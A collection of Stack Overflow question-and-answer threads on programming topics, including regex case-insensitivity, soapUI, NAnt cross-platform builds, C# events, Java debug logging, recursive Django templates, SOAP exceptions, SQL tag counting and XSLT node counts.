"One of the trickiest issues in internationalized search is upper and lower case. This notion of case is limited to languages written in the Latin, Greek, and Cyrillic character sets. English-speakers naturally expect search to be case-insensitive if only because they're lazy: if Nadia Jones wants to look herself up on Google she'll probably just type in nadia jones and expect the system to take care of it. So it's fairly common for search systems to "normalize" words by converting them all to lower- or upper-case, both for indexing and queries. The trouble is that the mapping between cases is not always as straightforward as it is in English. For example, the German lower-case character "ß" becomes "SS" when upper-cased, and good old capital "I" when down-cased in Turkish becomes the dotless "ı" (yes, they have "i", its upper-case version is "İ"). I have read (but not verified first-hand) that the rules for upcasing accented characters such as "é" are different in France and Québec. One of the results of all this is that software such as java.String.toLowerCase() tends to run astonishingly slow as it tries to work around all these corner-cases."

http://www.tbray.org/ongoing/When/200x/2003/10/11/SearchI18n

A: If you can tolerate having numbers and underscores in that regex, you can e.g. use the \w modifier (Perl syntax). I believe some engines support [:alpha:], but that is not pure Perl. \w takes into account the locale you are in, and matches both uppercase and lowercase, and I bet it is faster than using [A-Z] while ignoring case.

A: If you're concerned about this, it may be worthwhile to set the case to all upper or all lower before you check. For instance, in Perl:

$x = "abbCCDGBAdgfabv";
(lc $x) =~ /bad/;

may in some cases be better than

$x = "abbCCDGBAdgfabv";
$x =~ /bad/i;
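If you want to measure the difference yourself rather than take anyone's word for it, a quick-and-dirty C# micro-benchmark might look like the sketch below (the input string and iteration count are arbitrary, and the relative numbers will vary by runtime version and input):

using System;
using System.Diagnostics;
using System.Text.RegularExpressions;

class RegexBench
{
    static void Main()
    {
        string input = "The Quick Brown Fox Jumps Over The Lazy Dog";
        var withClass  = new Regex("[A-Za-z]+", RegexOptions.Compiled);
        var ignoreCase = new Regex("[a-z]+", RegexOptions.Compiled | RegexOptions.IgnoreCase);

        const int iterations = 1000000;

        // Time the explicit character class.
        var sw = Stopwatch.StartNew();
        for (int i = 0; i < iterations; i++) withClass.IsMatch(input);
        Console.WriteLine("character class: " + sw.ElapsedMilliseconds + " ms");

        // Time the IgnoreCase option.
        sw = Stopwatch.StartNew();
        for (int i = 0; i < iterations; i++) ignoreCase.IsMatch(input);
        Console.WriteLine("IgnoreCase:      " + sw.ElapsedMilliseconds + " ms");
    }
}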
{ "language": "en", "url": "https://stackoverflow.com/questions/32010", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "15" }
Q: Is soapUI the best web services testing tool/client/framework? I have been working on a web-services-related project for about the last year. Our team found soapUI near the start of our project and we have been mostly(*) satisfied with it (the free version, that is). My question is: are there other tools/clients/frameworks that you have used/currently use for web services testing and would recommend? (*) There are some weird GUI glitches that appear once in a while. As is mentioned by some of the answers, we attributed this to a memory leak.

A: I use soapUI, and it's generally pretty good. Be aware that it seems to leak memory, and eventually it will no longer save your project, so save regularly! This is about the only hassle I have with it (other than the general ugliness that almost every Java application has!), and I can't live without it.

A: There's an Eclipse plugin that allows you to do web service discovery, testing, etc. - see Eclipse Web Services Tools. I think it's much better than soapUI, at least on Mac OS X.

A: Call it laziness, but I kind of gave up looking a while after I found soapUI - it's not perfect (what is), but it does its job very well (especially given the price). More importantly, given that there is scripting to allow you to set up automated tests, we're heading towards an investment in the product. Might be nice if it was better on Windows (we do .NET development, mostly ASP.NET) but for the price... (-:

A: I've released an open source project for generating web service requests and making calls. Whether something is "the best" is pretty subjective, but give the program a try and compare it for yourself. Download it at http://drexyia.github.io/WsdlUI/

A: We've been using soapUI since 1.x (will soon be adopting 3.0 from 2.5.1) and are all happy. It's much more stable when running with the native LnF (File - Preferences - UI Settings - Native LF). I know it's available as an Eclipse plugin as well, but last I tried I failed to find how to add JAR files to it (i.e. bin/ext in the stand-alone variant).
{ "language": "en", "url": "https://stackoverflow.com/questions/32020", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "14" }
Q: NAnt and dual platform build - best way to build on Windows AND Mono/Linux I'm new to NAnt but have some experience with Ant and CruiseControl. What I want to do is have my SVN project include all tools needed (like NUnit and Mocks etc.) so I can check out onto a fresh machine and build. This strategy is outlined by J.P. Boodhoo here. So far so good if I only want to run on Windows, but I want to be able to check out onto Linux and build/test/run against Mono too. I want no dependencies external to the SVN project. I don't mind having two sets of tools in the project, but I want only one NAnt build file. This must be possible - but how? What are the tricks / 'traps for young players'?

A: This shouldn't be a particularly difficult exercise. We do some fairly similar stuff on one of my projects, since half of it runs on Java using Ant to run relevant targets, and the other half is .NET (C#) for the UI. The projects get run on Windows machines for development, but the servers (Java) run Linux; in the UAT environment (Linux) we need to run the NUnit tests (integration tests). The real trick (not really a difficult trick) behind this is having a NAnt build file that can run in both environments, which seems to be the same thing you're trying to do here. Of course you realise you'll need to install NAnt on Mono first:

$ export MONO_NO_UNLOAD=1
$ make clean
$ make
$ mono bin/NAnt.exe clean build

And then your build file needs to be written in such a way that it separates concerns. Some parts of the build file written for Windows will not work in Linux, for example. So you really just need to divide it up into specific targets in the build file. After that, there are a number of ways you can run specific targets from the command line. An example might look like this:

<project name="DualBuild">
  <property name="windowsDotNetPath" value="C:\WINDOWS\Microsoft.NET\Framework\v3.5" />
  <property name="windowsSolutionPath" value="D:\WorkingDirectory\branches\1234\source" />
  <property name="windowsNUnitPath" value="C:\Program Files\NUnit-Net-2.0 2.2.8\bin" />
  <property name="monoPath" value="You get the idea..." />

  <target name="BuildAndTestOnWindows" depends="WinUpdateRevision, WinBuild, WinTest" />
  <target name="BuildAndTestOnLinux" depends="MonoUpdateRevision, MonoBuild, MonoTest" />

  <target name="WinUpdateRevision">
    <delete file="${windowsSolutionPath}\Properties\AssemblyInfo.cs" />
    <exec program="subwcrev.exe"
          basedir="C:\Program Files\TortoiseSVN\bin\"
          workingdir="${windowsSolutionPath}\Properties"
          commandline="${windowsSolutionPath} .\AssemblyInfoTemplate.cs .\AssemblyInfo.cs" />
  </target>

  <target name="WinBuild">
    <exec program="msbuild.exe"
          basedir="${windowsDotNetPath}"
          workingdir="${windowsSolutionPath}"
          commandline="MySolution.sln /logger:ThoughtWorks.CruiseControl.MsBuild.XmlLogger, ThoughtWorks.CruiseControl.MsBuild.dll;msbuild-output.xml /nologo /verbosity:normal /noconsolelogger /p:Configuration=Debug /target:Rebuild" />
  </target>

  <target name="WinTest">
    <exec program="NCover.Console.exe"
          basedir="C:\Program Files\NCover"
          workingdir="${windowsSolutionPath}">
      <arg value="//x &quot;ClientCoverage.xml&quot;" />
      <arg value="&quot;C:\Program Files\NUnit-Net-2.0 2.2.8\bin\nunit-console.exe&quot; MySolution.nunit /xml=nunit-output.xml /nologo" />
    </exec>
  </target>

  <target name="MonoUpdateRevision">
    You get the idea...
  </target>

  <target name="MonoBuild">
    You get the idea...
  </target>

  <target name="MonoTest">
    You get the idea...
  </target>
</project>

For brevity, I've left parts of both sides out. The neat thing is that you can use NUnit as well as NAnt in both environments, and that makes things really easy from a dependency point of view. And for each executable you can swap in others that work in that environment, for example (xbuild for MSBuild, and svn for TortoiseSVN, etc.). Hope that helps, Cheers, Rob G

A: @Rob G - Hey! That's my post! ;) For some other good examples, be sure to browse the NUnit source code. I work closely with Charlie whenever I can to make sure it is building and testing on Mono. He tries to run it whenever he can as well.

A: It is worth noting that a lot of tools like NAnt run on Mono 'out of the box', i.e. mono nant.exe works.

A: I use the following template. It allows simple building on any platform (build on Windows or ./build.sh on Linux) and minimises duplication in the build scripts. The NAnt executable is stored with the project in tools\nant. The build config file determines which build tool to use, either MSBuild or xbuild (in this case, for Windows I require the VS2015 MSBuild version; change the path as required). The build-csproj target can be reused when you have multiple projects within a solution. The test-project target would need to be expanded upon for your needs. 
build.bat @tools\nant\nant.exe %* build.sh #!/bin/sh /usr/bin/cli tools/nant/NAnt.exe "$@" default.build <?xml version="1.0"?> <project name="MyProject" default="all"> <if test="${not property::exists('configuration')}"> <property name="configuration" value="release" readonly="true" /> </if> <if test="${platform::is-windows()}"> <property name="BuildTool" value="C:\Program Files (x86)\MSBuild\14.0\Bin\MSBuild.exe" readonly="true"/> </if> <if test="${platform::is-unix()}"> <property name="BuildTool" value="xbuild" readonly="true"/> </if> <property name="TestTool" value="tools/mytesttool.exe"/> <target name="all" depends="myproject myprojectlib" /> <target name="build-csproj" description="Build a given csproj"> <!-- Must not be called standalone as it requires some properties set. --> <exec program="${BuildTool}"> <arg path="src/${ProjectName}/${ProjectName}.csproj" /> <arg line="/property:Configuration=${configuration}" /> <arg value="/target:Rebuild" /> <arg value="/verbosity:normal" /> <arg value="/nologo" /> </exec> </target> <target name="test-project"> <!-- Must not be called standalone as it requires some properties set. --> <exec program="${TestTool}"> <arg path="my/${ProjectName}/tests/path/for/tool" /> <arg value="/aproperty=value" /> </exec> </target> <target name="myproject" description="Build the project"> <property name="ProjectName" value="MyProject"/> <call target="build-csproj" /> <call target="test-project" /> </target> <target name="myprojectlib" description="Build the project's library dll"> <property name="ProjectName" value="MyProjectLib"/> <call target="build-csproj" /> <call target="test-project" /> </target> </project>
{ "language": "en", "url": "https://stackoverflow.com/questions/32027", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
Q: In C#, isn't the observer pattern already implemented using Events? After reading the Head First Design Patterns book and using a number of other design patterns, I'm trying to understand the Observer pattern. Isn't this already implemented using events in the .NET Framework?

A: Yes, it's identical. A note: if you really want to understand events, I recommend learning the observer pattern and implementing it yourself for a while. Once you fully understand it, stop doing it yourself and use the professional and well-documented implementation, unless you have a real need to do otherwise.

A: That's right, events are an implementation of the observer pattern. I have read discussions, though, of people who still write their own, to give them either more flexibility, or maybe just to avoid the event-raising syntax.

A: Yes, but programming the observer pattern explicitly, and thus not using delegates and events, can result in easier debugging of your code. Consider the difference:

public void NotifyObservers()
{
    foreach (Product product in ProductList)
    {
        if (product is IProductObserver)
        {
            ((IProductObserver)product).Update(this);
        }
    }
}

Here it is very clear which products in the list get notified of a change. While debugging you can inspect the ProductList... When using delegates and events it can be more cumbersome to find out how many "delegates" were actually "subscribed" to handle the event.

A: Yes, it is. The observer pattern is also called the publish/subscribe pattern, which is exactly what events allow you to do.

A: I would say yes; it was Anders Hejlsberg's intent to make the observer pattern a first-class language feature with events in C#, based on his experience with Delphi. Anders makes this and other design intentions clear in an excellent interview on Software Engineering Radio.

A: Most modern languages have native support for some of the design patterns. It has been argued that a language is better the more patterns it supports natively, without the need to implement them explicitly, and that Lisp is excellent in this regard. Jeff had something to say about that, too.

A: Microsoft itself states that using events and delegates is the C# way of applying the Observer pattern. Using some basic naming conventions for events and delegates, they named their own variant the "Event Pattern", which does exactly the same thing while providing some extra advantages over the classic Observer pattern. The "Event Pattern" is described in the MSDN Library inside the "Exploring the Observer Design Pattern" article. Reference, from that MSDN article: "Based on events and delegates, the FCL uses the Observer pattern quite extensively. The designers of the FCL fully realized the inherent power of this pattern, applying it to both user interface and non-UI specific features throughout the Framework. This use, however, is a slight variation on the base Observer pattern, which the Framework team has termed the Event Pattern. In general, this pattern is expressed as formal naming conventions for delegates, events, and related methods involved in the event notification process. Microsoft recommends that all applications and frameworks that utilize events and delegates adopt this pattern, although there is no enforcement in the CLR or standard compiler. Based on this examination of the Observer pattern, it should be evident that this pattern provides an ideal mechanism to ensure crisp boundaries between objects in an application, regardless of their function (UI or otherwise). 
Although fairly simple to implement via callbacks (using the IObserver and IObservable interfaces), the CLR concepts of delegates and events handle the majority of the "heavy lifting," as well as decreasing the level of coupling between subject and observer. A: No, they achieve the same intent, however they are different. I would say that the Observer pattern is quite a hack of over design to achieve something you could have achieved easily with functional programming, and that .NET events uses functional programming to achieve the same goal.
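For illustration, here is a minimal sketch of the same subject/observer relationship expressed with a C# event; all type and member names below are invented for the example:

using System;

// The "subject": publishes notifications through an event
public class Stock
{
    public event EventHandler<PriceChangedEventArgs> PriceChanged;

    private decimal price;
    public decimal Price
    {
        get { return price; }
        set
        {
            price = value;
            // Raise the event; the null check covers the zero-subscriber case
            EventHandler<PriceChangedEventArgs> handler = PriceChanged;
            if (handler != null)
                handler(this, new PriceChangedEventArgs(value));
        }
    }
}

public class PriceChangedEventArgs : EventArgs
{
    public decimal NewPrice { get; private set; }
    public PriceChangedEventArgs(decimal newPrice) { NewPrice = newPrice; }
}

class Program
{
    static void Main()
    {
        Stock stock = new Stock();
        // The "observer": attaching a handler is the subscription step
        stock.PriceChanged += (sender, e) => Console.WriteLine("New price: " + e.NewPrice);
        stock.Price = 42.50m;
    }
}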
{ "language": "en", "url": "https://stackoverflow.com/questions/32034", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "33" }
Q: How to remove debug statements from production code in Java Is it possible for the compiler to remove statements used for debugging purposes (such as logging) from production code? The debug statements would need to be marked somehow, maybe using annotations. It's easy to set a property (debug = true) and check it at each debug statement, but this can reduce performance. It would be nice if the compiler would simply make the debug statements vanish. A: Two recommendations. First: for real logging, use a modern logging package like log4j or Java's own built-in logging. Don't worry about performance so much; the logging level check is on the order of nanoseconds (it's an integer comparison). And if you have more than a single log statement, guard the whole block (log4j, for example): if (logger.isDebugEnabled()) { // perform expensive operations // build string to log logger.debug("...."); } This gives you the added ability to control logging at runtime. Having to restart and run a debug build can be very inconvenient. Second: You may find assertions are more what you need. An assertion is a statement which evaluates to a boolean result, with an optional message: assert (sky.state != FALLING) : "The sky is falling!"; Whenever the assertion evaluates to false, the assertion fails and an AssertionError is thrown containing your message (this is an unchecked exception, intended to exit the application). The neat thing is, these are treated specially by the JVM and can be toggled at runtime down to the class level, using a VM parameter (no recompile needed). If not enabled, there is zero overhead. A: public abstract class Config { public static final boolean ENABLELOGGING = true; } import static Config.*; public class MyClass { public void myMethod() { System.out.println("Hello, non-logging world"); if (ENABLELOGGING) { log("Hello, logging world."); } } } The compiler will remove the code block with "Hello, logging world." in it if ENABLELOGGING is set to false, because it's a static final value. If you use an obfuscator such as ProGuard, then the Config class will vanish too. An obfuscator would also allow things like this instead: public class MyClass { public void myMethod() { System.out.println("Hello, non-logging world"); Log.log("Hello, logging world."); } } import static Config.*; public abstract class Log { public static void log(String s) { if (ENABLELOGGING) { System.out.println(s); // or write to the real log destination } } } The method Log#log would reduce to nothing in the compiler, and be removed by the obfuscator, along with any calls to that method, and eventually even the Log class itself would be removed. A: Another possibility is to put the if statement within your logging function; you get less code this way, but at the expense of some extra function calls. I'm also not a big fan of completely removing the debug code. Once you're in production, you'll probably need access to debug messages if something goes wrong. If you remove all of your code-level debugging, then this isn't a possibility. A: This "trick" seems to make your debug statements vanish: public static final boolean DEBUG = false; if (DEBUG) { // disappears on compilation } The post said that javac is smart enough to check the static final boolean and exclude the debug statements. (I did not personally try it.) For logging, I personally do not like to see code like: if (logger.isDebugEnabled()) { logger.debug("...."); } realImportantWork(); The logging scaffolding distracts me from the realImportantWork(). 
The right way for me is: logger.debug("...."); realImportantWork(); plus a config which excludes all debug messages in production. I mean that the logger.isDebugEnabled() control should be the job of the logging framework, not my job. Most logging frameworks support concepts like "logger" and "LogLevel", which can do the trick. A: Use a Java preprocessor? (My Google-fu is weak, but this is a link to the old Joel forums discussing it.) A: Java contains some sort of preprocessor of its own. It's called APT. It processes and generates code. At the moment I'm not sure how this should work (I haven't tried it), but it seems to be used for this kind of thing. A: I would also highly recommend using a logging framework. The logger.isDebugEnabled() check is not mandatory; it is just that it can be faster to check whether the system is at the debug level before logging. Using a logging framework means you can configure logging levels on the fly without restarting the application. You could have logging like: logger.error("Something bad happened"); logger.debug("Something bad happened, with loads more detail"); A: To directly answer your question: I don't know. But here is another solution to your problem: In my mind, there are two statements that collide with each other here: "debug statements" and "production code". What is the purpose of debug statements? To help get rid of bugs while (unit) testing. If a piece of software is properly tested and works according to the requirements, debug statements are nothing else but OBSOLETE. I strongly disagree with leaving any debug statements in production code. I bet nobody bothers testing the side-effects of debug code in production code. The code probably does what it's supposed to do, but does it do more than that? Do all your #defines work correctly and really take ALL of the debug code out? Who analyzes 100000 lines of pre-processed code to see if all the debug stuff is gone? Unless we have a different definition of production code, you should consider taking out the debug statements after the code is tested and be done with it.
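To make the assertion suggestion earlier in this thread concrete, here is a minimal sketch; the class name is invented, and the -ea/-da flags are the standard JVM assertion switches:

// Demo.java
public class Demo {
    public static void main(String[] args) {
        int state = -1;
        // Fails only when assertions are enabled for this class
        assert state >= 0 : "The sky is falling!";
        System.out.println("state looked fine (or assertions were off)");
    }
}

// Toggle at launch time, no recompile needed:
//   java Demo                    -> assertions off (zero overhead)
//   java -ea Demo                -> throws AssertionError: The sky is falling!
//   java -ea:com.example... App  -> enable for a single package subtree
//   java -da Demo                -> explicitly disable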
{ "language": "en", "url": "https://stackoverflow.com/questions/32041", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "16" }
Q: How can I render a tree structure (recursive) using a django template? I have a tree structure in memory that I would like to render in HTML using a Django template. class Node(): name = "node name" children = [] There will be some object root that is a Node, and children is a list of Nodes. root will be passed in the context of the template. I have found this one discussion of how this might be achieved, but the poster suggests this might not be good in a production environment. Does anybody know of a better way? A: I had the same problem and I wrote a template tag. I know there are other tags like this out there but I needed to learn to make custom tags anyway :) I think it turned out pretty well. Read the docstring for usage instructions. github.com/skid/django-recurse A: Using the with template tag, I could do a tree/recursive list. Sample code: main template, assuming 'all_root_elems' is a list of one or more roots of the tree: <ul> {%for node in all_root_elems %} {%include "tree_view_template.html" %} {%endfor%} </ul> tree_view_template.html renders the nested ul, li and uses the node template variable as below: <li> {{node.name}} {%if node.has_childs %} <ul> {%for ch in node.all_childs %} {%with node=ch template_name="tree_view_template.html" %} {%include template_name%} {%endwith%} {%endfor%} </ul> {%endif%} </li> A: I'm too late. All of you use so many unnecessary with tags; this is how I do recursion: In the "main" template: <!-- let's say that menu_list is already defined --> <ul> {% include "menu.html" %} </ul> Then in menu.html: {% for menu in menu_list %} <li> {{ menu.name }} {% if menu.submenus|length %} <ul> {% include "menu.html" with menu_list=menu.submenus %} </ul> {% endif %} </li> {% endfor %} A: I think the canonical answer is: "Don't". What you should probably do instead is unravel the thing in your view code, so it's just a matter of iterating over (in|de)dents in the template. I think I'd do it by appending indents and dedents to a list while recursing through the tree and then sending that "travelogue" list to the template. (The template would then insert <li> and </li> from that list, creating the recursive structure without "understanding" it.) I'm also pretty sure recursively including template files is really the wrong way to do it... A: This might be way more than you need, but there is a Django module called 'mptt' - this stores a hierarchical tree structure in an SQL database, and includes templates for display in the view code. You might be able to find something useful there. Here's the link: django-mptt A: Yes, you can do it. It's a little trick, passing the filename to {% include %} as a variable: {% with template_name="file/to_include.html" %} {% include template_name %} {% endwith %} A: Django has a built-in template helper for this exact scenario: https://docs.djangoproject.com/en/dev/ref/templates/builtins/#unordered-list A: Does no one like dicts? I might be missing something here, but it would seem the most natural way to set up menus. Using keys as entries and values as links, pop it in a DIV/NAV and away you go! From your base # Base.html <nav> {% with dict=contents template="treedict.html" %} {% include template %} {% endwith %} </nav> call this # TreeDict.html <ul> {% for key,val in dict.items %} {% if val.items %} <li>{{ key }}</li> {%with dict=val template="treedict.html" %} {%include template%} {%endwith%} {% else %} <li><a href="{{ val }}">{{ key }}</a></li> {% endif %} {% endfor %} </ul> I haven't tried the default or the ordered one yet; perhaps you have? 
A: Correcting the include-based approach above: root_comment.html {% extends 'students/base.html' %} {% load i18n %} {% load static from staticfiles %} {% block content %} <ul> {% for comment in comments %} {% if not comment.parent %} {# add this logic #} {% include "comment/tree_comment.html" %} {% endif %} {% endfor %} </ul> {% endblock %} tree_comment.html <li>{{ comment.text }} {%if comment.children %} <ul> {% for ch in comment.children.get_queryset %} {# related_name in model #} {% with comment=ch template_name="comment/tree_comment.html" %} {% include template_name %} {% endwith %} {% endfor %} </ul> {% endif %} </li> For example, the model: from django.db import models from django.contrib.auth.models import User from django.utils.translation import ugettext_lazy as _ # Create your models here. class Comment(models.Model): class Meta(object): verbose_name = _('Comment') verbose_name_plural = _('Comments') parent = models.ForeignKey( 'self', on_delete=models.CASCADE, parent_link=True, related_name='children', null=True, blank=True) text = models.TextField( max_length=2000, help_text=_('Please, your Comment'), verbose_name=_('Comment'), blank=True) public_date = models.DateTimeField( auto_now_add=True) correct_date = models.DateTimeField( auto_now=True) author = models.ForeignKey(User, on_delete=models.CASCADE) A: I had a similar issue; however, I had first implemented the solution using JavaScript, and just afterwards considered how I would have done the same thing in Django templates. I used the serializer utility to turn a list of models into JSON, and used the JSON data as a basis for my hierarchy.
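That serializer approach might look something like this (the model name is assumed):

from django.core import serializers

# Serialize a queryset to JSON; a client-side script can then build the tree from it
data = serializers.serialize('json', Node.objects.all())

And for completeness, the built-in unordered_list filter mentioned in an earlier answer takes a nested-list structure rather than model objects; a minimal sketch, with the data shape taken from the Django docs and the variable name invented:

{# view context: tree = ['States', ['Kansas', ['Lawrence', 'Topeka'], 'Illinois']] #}
<ul>{{ tree|unordered_list }}</ul>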
{ "language": "en", "url": "https://stackoverflow.com/questions/32044", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "74" }
Q: How do I extract the inner exception from a soap exception in ASP.NET? I have a simple web service operation like this one: [WebMethod] public string HelloWorld() { throw new Exception("HelloWorldException"); return "Hello World"; } And then I have a client application that consumes the web service and then calls the operation. Obviously it will throw an exception :-) try { hwservicens.Service1 service1 = new hwservicens.Service1(); service1.HelloWorld(); } catch(Exception e) { Console.WriteLine(e.ToString()); } In my catch-block, what I would like to do is extract the Message of the actual exception to use it in my code. The exception caught is a SoapException, which is fine, but its Message property is like this... System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Exception: HelloWorldException at WebService1.Service1.HelloWorld() in C:\svnroot\Vordur\WebService1\Service1.asmx.cs:line 27 --- End of inner exception stack trace --- ...and the InnerException is null. What I would like to do is extract the Message property of the InnerException (the HelloWorldException text in my sample); can anyone help with that? If you can avoid it, please don't suggest parsing the Message property of the SoapException. A: Unfortunately I don't think this is possible. The exception you are raising in your web service code is being encoded into a SOAP fault, which is then passed as a string back to your client code. What you are seeing in the SoapException message is simply the text from the SOAP fault, which is not being converted back to an exception, but merely stored as text. If you want to return useful information in error conditions then I recommend returning a custom class from your web service which can have an "Error" property which contains your information. [WebMethod] public ResponseClass HelloWorld() { ResponseClass c = new ResponseClass(); try { throw new Exception("Exception Text"); // simulating a failure; on success you would instead set: // c.WasError = false; c.ReturnValue = "Hello World"; } catch(Exception e) { c.WasError = true; c.ErrorMessage = e.Message; } return c; } A: It IS possible! Service operation example: try { // do something good for humanity } catch (Exception e) { throw new SoapException(e.InnerException.Message, SoapException.ServerFaultCode); } Client consuming the service: try { // save humanity } catch (Exception e) { Console.WriteLine(e.Message); } Just one thing - you need to set customErrors mode='RemoteOnly' or 'On' in your web.config (of the service project). Credit for the customErrors discovery: http://forums.asp.net/t/236665.aspx/1 A: I ran into something similar a bit ago and blogged about it. I'm not certain if it is precisely applicable, but it might be. The code is simple enough once you realize that you have to go through a MessageFault object. In my case, I knew that the detail contained a GUID I could use to re-query the SOAP service for details. The code looks like this: catch (FaultException soapEx) { MessageFault mf = soapEx.CreateMessageFault(); if (mf.HasDetail) { XmlDictionaryReader reader = mf.GetReaderAtDetailContents(); Guid g = reader.ReadContentAsGuid(); } }
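Back on the classic ASMX client in the question: SoapException also exposes a Detail property (an XmlNode) that the server side can populate, which avoids parsing Message; the handling below is an illustrative sketch, not the poster's code:

try
{
    service1.HelloWorld();
}
catch (SoapException ex)
{
    // Detail is the raw <detail> element of the SOAP fault;
    // it is only non-empty if the server put something there
    if (ex.Detail != null)
        Console.WriteLine(ex.Detail.InnerText);
    else
        Console.WriteLine(ex.Message); // falls back to the fault text
}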
{ "language": "en", "url": "https://stackoverflow.com/questions/32058", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "15" }
Q: How can I get the number of occurrences in a SQL IN clause? Let's say I have four tables: PAGE, USER, TAG, and PAGE-TAG: Table | Fields ------------------------------------------ PAGE | ID, CONTENT TAG | ID, NAME USER | ID, NAME PAGE-TAG | ID, PAGE-ID, TAG-ID, USER-ID And let's say I have four pages: PAGE#1 'Content page 1' tagged with tag#1 by user1, tagged with tag#1 by user2 PAGE#2 'Content page 2' tagged with tag#3 by user2, tagged with tag#1 by user2, tagged with tag#8 by user1 PAGE#3 'Content page 3' tagged with tag#7 by user#1 PAGE#4 'Content page 4' tagged with tag#1 by user1, tagged with tag#8 by user1 I expect my query to look something like this: select page.content ? from page, page-tag where page.id = page-tag.pag-id and page-tag.tag-id in (1, 3, 8) order by ? desc I would like to get output like this: Content page 2, 3 Content page 4, 2 Content page 1, 1 Quoting Neall: Your question is a bit confusing. Do you want to get the number of times each page has been tagged? No The number of times each page has gotten each tag? No The number of unique users that have tagged a page? No The number of unique users that have tagged each page with each tag? No I want to know how many of the passed tags appear on a particular page, not just whether any of the tags appear. SQL IN works like the boolean operator OR: if a page was tagged with any value within the IN clause then it returns true. I would like to know how many of the values inside the IN clause return true. Below I show the output I expect: page 1 | in (1,2) -> 1 page 1 | in (1,2,3) -> 1 page 1 | in (1) -> 1 page 1 | in (1,3,8) -> 1 page 2 | in (1,2) -> 1 page 2 | in (1,2,3) -> 2 page 2 | in (1) -> 1 page 2 | in (1,3,8) -> 3 page 4 | in (1,2,3) -> 1 page 4 | in (1,2,3) -> 1 page 4 | in (1) -> 1 page 4 | in (1,3,8) -> 2 This will be the content of the page-tag table I mentioned before: id page-id tag-id user-id 1 1 1 1 2 1 1 2 3 2 3 2 4 2 1 2 5 2 8 1 6 3 7 1 7 4 1 1 8 4 8 1 @Kristof that is not exactly what I am searching for, but thanks anyway. @Daren If I execute your code I get the following error: #1054 - Unknown column 'page-tag.tag-id' in 'having clause' @Eduardo Molteni Your answer does not give the output in the question, but: Content page 2 8 Content page 4 8 content page 2 3 content page 1 1 content page 1 1 content page 2 1 content page 4 1 @Keith I am using plain SQL, not T-SQL, and I am not familiar with T-SQL, so I do not know how your query translates to plain SQL. Any more ideas? A: This might work: select page.content, count(page-tag.tag-id) as tagcount from page inner join page-tag on page-tag.page-id = page.id group by page.content having page-tag.tag-id in (1, 3, 8) A: OK, so the key difference between this and kristof's answer is that you only want a count of 1 to show against page 1, because it has been tagged only with one tag from the set (even though two separate users both tagged it). I would suggest this: SELECT page.ID, page.content, count(*) AS uniquetags FROM ( SELECT DISTINCT page.content, page.ID, page-tag.tag-id FROM page INNER JOIN page-tag ON page.ID=page-tag.page-ID WHERE page-tag.tag-id IN (1, 3, 8) ) GROUP BY page.ID I don't have a SQL Server installation to check this, so apologies if there's a syntax mistake. But semantically I think this is what you need. This may not give the output in descending order of number of tags, but try adding: ORDER BY uniquetags DESC at the end. My uncertainty is whether you can use ORDER BY outside of grouping in SQL Server. 
If not, then you may need to nest the whole thing in another SELECT. A: In T-SQL: select count(distinct name) from page-tag where tag-id in (1, 3, 8) This will give you a count of the number of different tag names for your list of ids. A: Agree with Neall, the question is a bit confusing. If you want the output listed in the question, the SQL is as simple as: select page.content, page-tag.tag-id from page, page-tag where page.id = page-tag.pag-id and page-tag.tag-id in (1, 3, 8) order by page-tag.tag-id desc But if you want the tag count, Daren answered your question. A: select page.content, count(pageTag.tagID) as tagCount from page inner join pageTag on page.ID = pageTag.pageID where pageTag.tagID in (1, 3, 8) group by page.content order by tagCount desc That gives you the number of tags per page, ordered by the highest number of tags. I hope I understood your question correctly. A: Leigh Caldwell's answer is correct, thanks man, but you need to add an alias, at least in MySQL. So the query will look like: SELECT page.ID, page.content, count(*) AS uniquetags FROM ( SELECT DISTINCT page.content, page.ID, page-tag.tag-id FROM page INNER JOIN page-tag ON page.ID=page-tag.page-ID WHERE page-tag.tag-id IN (1, 3, 8) ) as page GROUP BY page.ID order by uniquetags desc
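For reference, the same result can be written without the nested SELECT by counting distinct tag ids directly; a sketch using underscored names, since hyphenated identifiers would need quoting in most databases:

SELECT p.id, p.content, COUNT(DISTINCT pt.tag_id) AS uniquetags
FROM page p
INNER JOIN page_tag pt ON pt.page_id = p.id
WHERE pt.tag_id IN (1, 3, 8)
GROUP BY p.id, p.content
ORDER BY uniquetags DESC;

-- Against the sample data this yields page 2 -> 3, page 4 -> 2, page 1 -> 1,
-- matching the expected output (the two user1/user2 rows for page 1 collapse
-- under DISTINCT).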
{ "language": "en", "url": "https://stackoverflow.com/questions/32059", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "1" }
Q: Nodesets Length In XSLT how would you find out the length of a node-set? A: There is no need to put that into a <xsl:variable name="length" select="count(nodes/node)"/> though... you can just print it out as follows: <xsl:value-of select="count(nodes/node)"/> or use it in an if-clause as follows: <xsl:if test="count(comments/comment) > 0"> <ul> <xsl:apply-templates select="comments/comment"/> </ul> </xsl:if> A: Generally in XSLT things aren't referred to as arrays, since there is really no such thing in XSLT. The technical term is either node-sets (made up of zero or more nodes) or, in XSLT 2.0, sequences. A: <xsl:variable name="length" select="count(nodeset)"/>
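Putting it together, a minimal self-contained sketch (the input document shape is invented):

<!-- input.xml: <nodes><node/><node/><node/></nodes> -->
<!-- stylesheet fragment; count() returns the size of the node-set (3 here): -->
<xsl:template match="/">
  <xsl:value-of select="count(nodes/node)"/>
</xsl:template>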
{ "language": "en", "url": "https://stackoverflow.com/questions/32085", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "11" }
